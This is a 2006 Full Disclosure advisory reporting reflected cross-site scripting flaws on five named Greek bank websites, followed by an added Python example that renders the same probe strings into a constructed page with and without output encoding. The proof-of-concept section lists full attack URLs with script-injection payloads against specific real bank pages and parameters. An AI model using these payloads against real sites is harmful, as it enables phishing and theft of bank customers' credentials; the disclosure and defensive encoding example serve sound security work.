Full Disclosure mailing list archives

Cross Site Scripting at Several Greek Banks.


From: "Sentinel" <info () sentinel gr>
Date: Wed, 20 Sep 2006 09:59:15 +0300

                      Sentinel Computer Security Advisory


Sentinel Co.
http://www.sentinel.gr
info () sentinel gr


General Flaw Description : Cross Site Scripting Vulnerabilities in multiple
                           Greek Web Banking sites.
-------------------------------------------------------------------------------
                             Advisory Information
-------------------------------------------------------------------------------
Advisory Release Date : 2006/09/01
Advisory ID : SGA-0002
Extends : None
Deprecates : None
-------------------------------------------------------------------------------
                             Product Information
-------------------------------------------------------------------------------
Flawed File Name : http://www.eurobank.gr/online/home/pops.aspx,
                   http://www.winbank.gr/eCPage.asp,
                   http://www.emporiki.gr/cbg/gr/search/search.jsp,
                   http://www.piraeusbank.gr/ecportal.asp,
                   http://www.probank.gr/search/index.php
-------------------------------------------------------------------------------
                          Vulnerability Information
-------------------------------------------------------------------------------
Flaw Type : Cross Site Scripting
Vulnerability Impact : Phishing and Scam attacks
Vulnerability Rating : Critical
Patch Status : Partially Patched
Advisory Status : Verified
Publicity Level : Published
Other Advisories IDs : None
Flaw Discovery Date : 2006/08/31
Patch Date : 2006/09/02
Vulnerability Credit : Emmanouil Gavriil (egavriil () sentinel gr)
Exploit Status : Not Released
Exploit Publication Date : None
-------------------------------------------------------------------------------


Description
-----------

Many Greek banks use a Web Banking service to assist their customers with
their transactions. Eurobank, Winbank, Piraeus Bank, Probank and Emporiki Bank
were found to be vulnerable to Cross Site Scripting attacks, which can lead to
execution of arbitrary SCRIPT and HTML code in the user's browser.


Technical Information
---------------------

www.eurobank.gr makes use of multiple aspx files which fail to sanitise
variables. Most of the aspx files on the Eurobank website that take variables
as input are vulnerable to XSS.

www.winbank.gr uses a search function which does not properly sanitise the
input of the variable text_search.

www.emporiki.gr uses a jsp search function which does not properly sanitise
the input of the variable searchFld.

www.piraeusbank.gr has exactly the same problem as Winbank, as it is
actually the same bank. Even though it doesn't have a Web Banking System
itself, it forwards Web Banking requests to winbank. Cross Site Scripting
is possible, and thus the danger is the same, as an unsuspecting user can be
led from www.piraeusbank.gr with a valid redirection to a fake www.winbank.gr
login screen.

www.probank.gr doesn't have a Web Banking Service but the site is vulnerable
to XSS and, while account compromise is not possible, valuable information such
as CARD and PIN numbers can be stolen through phishing/scam attacks.


Proof of Concept Experiment
---------------------------

http://www.eurobank.gr/online/home/pops.aspx?';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}

http://www.winbank.gr/eCPage.asp?Page=eCFullSearchResults.asp&lang=1&text_search=%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.emporiki.gr/cbg/gr/search/search.jsp?searchFld=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}

http://www.piraeusbank.gr/ecportal.asp?id=235212&nt=107&pageno=1&fromsearch=234010&lang=2&tid=&txtSearch=%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.probank.gr/search/index.php?qu=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}


Patch Description and Information
---------------------------------

The banks have been informed. All banks except Emporiki Bank have fixed the
vulnerability.


References and Other Resources for Information
----------------------------------------------

None.

EOF.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
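
Added example, not part of the advisory and not any bank's code: a constructed
search-results template that reflects a parameter into an HTML context and into
an inline JavaScript string, rendered once without sanitisation and once with
per-context output encoding. The template, function names and the variable
lastQuery are assumptions; the two probe values are taken from the query strings
listed in the advisory.

```python
import html
import json
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed template, not real markup; the value stands for text_search, searchFld or qu.
PAGE = ("<html><body><p>Results for: {body}</p>"
        "<script>var lastQuery = {js};</script></body></html>")

# Test values taken from the query strings in the advisory.
HTML_PROBE = unquote("%3Cscript%3Ealert('XSS')%3C/script%3E")
JS_PROBE = "';alert(String.fromCharCode(88,83,83))//"

def render_vulnerable(q):
    # Raw reflection into an HTML context and into a quoted JS string.
    return PAGE.format(body=q, js="'" + q + "'")

def js_string(q):
    # json.dumps gives an escaped JS string literal; <, > and & are escaped too
    # so "</script>" or "<!--" in the value cannot affect the script element.
    s = json.dumps(q)
    for ch in "<>&":
        s = s.replace(ch, "\\u%04x" % ord(ch))
    return s

def render_hardened(q):
    # Encode per output context: entity-encode for HTML, literal-encode for JS.
    return PAGE.format(body=html.escape(q, quote=True), js=js_string(q))

class ScriptCollector(HTMLParser):
    """Collects the text of every <script> element a parser finds."""
    def __init__(self):
        super().__init__()
        self.bodies, self.inside = [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.bodies.append("")
            self.inside = True
    def handle_endtag(self, tag):
        if tag == "script":
            self.inside = False
    def handle_data(self, data):
        if self.inside:
            self.bodies[-1] += data

def script_bodies(page):
    parser = ScriptCollector()
    parser.feed(page)
    parser.close()
    return parser.bodies
```

A hardened page should contain exactly the one script element from the template,
and its string literal should decode back to the submitted value unchanged.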